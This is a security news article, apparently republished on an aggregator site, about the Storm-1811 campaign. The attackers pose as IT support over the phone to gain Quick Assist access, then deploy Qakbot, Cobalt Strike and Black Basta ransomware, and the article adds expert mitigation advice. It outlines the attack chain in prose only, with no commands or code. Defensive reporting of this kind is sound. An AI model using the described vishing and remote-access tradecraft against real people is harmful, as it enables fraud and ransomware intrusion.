Windows Quick Assist Anchors Black Basta Ransomware Gambit

  /     /     /  
Publicated : 23/11/2024   Category : security


Windows Quick Assist Anchors Black Basta Ransomware Gambit


When abused by threat actors with sophisticated social-engineering chops, remote-access tools demand that enterprises remain sharp in both defense strategy and employee-awareness training.



Following a
recently documented
Black Basta ransomware vishing campaign, Microsoft Threat Intelligence acknowledged May 15 that a financially motivated threat actor tracked as Storm-1811 since mid-April has been following the playbook.
The threat group is using a
socially engineered
campaign to trick victims into letting them
use Quick Assist
for remote access to their machines by posing as trusted contacts, such as Microsoft technical support or an IT professional from the targeted users company.
Quick Assist
is a Windows app that enables a person to share their Windows or macOS device with someone else over a remote connection.
Vishing campaigns
in which a threat actor has been abusing a Windows remote-access app to deliver Black Basta ransomware demonstrates the risk inherent in such solutions when they are paired with sophisticated social engineering. This threat demands a similarly savvy response from enterprise security teams, who must bolster vigilance and advise employees across organizations to do the same, experts say.
Once they establish trust and gained remote access, Storm-1811 then uses this channel to deliver various malware remotely to victim machines, culminating in the delivery of Black Basta ransomware for financial gain, according to
a blog post
by Microsoft Threat Intelligence. Victims also may receive a bomb of emails and then vishing calls from threat actors impersonating IT or help-desk personnel.
The attacks demonstrate how easy it is for threat actors to abuse legitimate remote-access tools to deceive and compromise users, especially if their social-engineering skills to get a victim to fall for a malicious ruse are solid, security experts said.
Advanced social engineering attacks are what cybercriminals use when … they cannot breach [an organization] using simpler methods such as basic phishing emails or compromising weak credentials, notes Darren Guccione, CEO and co-founder of security firm
Keeper Security
, in an email to Dark Reading.
The growing sophistication that attackers have demonstrated with these tactics and their clever use of remote-access tools highlights the continued need for ongoing training and education of employees in how to spot such tricks as they evolve, he says.
Because Quick Assist allows the user to share their device over a remote connection, the application carries the potential for damaging malicious activity, Guccione says.
In the attack vector described by Microsoft Threat Intelligence, Storm-1811 either uses
vishing
to impersonate IT or help desk personnel, pretending to conduct generic fixes on a device, or engages in email bombing to flood users inboxes with content on services that theyve subscribed to.
Following the email flood, the threat actor impersonates IT support through phone calls to the target user, claiming to offer assistance in remediating the spam issue, according to Microsoft.
Indeed, this email bombing is a critical aspect of advanced social engineering, serving to overwhelm and confuse the victim before the attacker reaches out by phone to manipulate them into accepting a malicious Quick Assist request, Stephen Kowski, field CTO at
SlashNext
, notes.
Once this connection is set up, attackers are free to operate at will on a victims machine. In the case of the attacks described by both Rapid 7 and Microsoft, this activity ultimately ends with the deployment of Black Basta ransomware.
Microsoft also observed Storm-1811 delivering a flurry of malware to victim machines in the leadup to the Black Basta payload, including remote monitoring and management (RMM) tools like ScreenConnect and NetSupport Manager, malware such as Qakbot, and Cobalt Strike.
Once access was gained via Quick Assist, the attacker ran a scripted curl command to download a series of batch files or ZIP files used to deliver the varied malicious payloads. Some of the batch scripts suggested the use of fake spam filter updates that required the targets to provide sign-in credentials, according to Microsoft.
Storm-1811 then used
Qakbot
to deliver a Cobalt Strike Beacon, and next established persistence and conducted lateral movement within the compromised environment via ScreenConnect.
NetSupport Manager, another remote access tool, likely was deployed to maintain control over compromised devices to further download and install additional malware, as well as launch arbitrary commands, according to Microsoft.
In some cases, Storm-1811 also leveraged the OpenSSH tunneling tool to establish a secure shell (SSH) tunnel for persistence. Eventually, the actor used PsExec to deploy
Black Basta
ransomware throughout the network.
Given how vulnerable an organization is once a corporate user gives attackers remote access to his or her machine willingly, one way to mitigate such attacks is to uninstall such tools as Quick Assist when they are not in use, both Microsoft and experts advised.
Organizations also can implement a privilege access management (PAM) solution with a zero-trust architecture, which prevents unauthorized privilege escalation and ensures that user access roles are strongly enforced, Guccione says. 
A major goal of zero trust is to limit users to the resources and information for which they are authorized, which reduces the blast radius in the event of a breach, he says.
Both Microsoft and experts also advised that organizations use advanced and consistent employee training to help them spot vishing and social engineering-based attacks, which can prevent compromise even though Guccione acknowledged that
anyone
can fall for them.
Still, employees are better equipped to combat them when their organization provides regular security training and educates employees about malicious attachments, links, and tech support scams such as this, he says.
Event monitoring and advanced email solutions also can neutralize the email bombing tactic of such campaigns, causing the subsequent phone call to stand out as suspicious and illegitimate immediately, Kowski says.
Luckily, nowadays, GenAI phishing solutions are installed in five minutes without any changes in user experience or significant infrastructure changes, he says.

Last News

▸ Debunking Machine Learning in Security. ◂
Discovered: 23/12/2024
Category: security

▸ Researchers create BlackForest to gather, link threat data. ◂
Discovered: 23/12/2024
Category: security

▸ Travel agency fined £150,000 for breaking Data Protection Act. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
Windows Quick Assist Anchors Black Basta Ransomware Gambit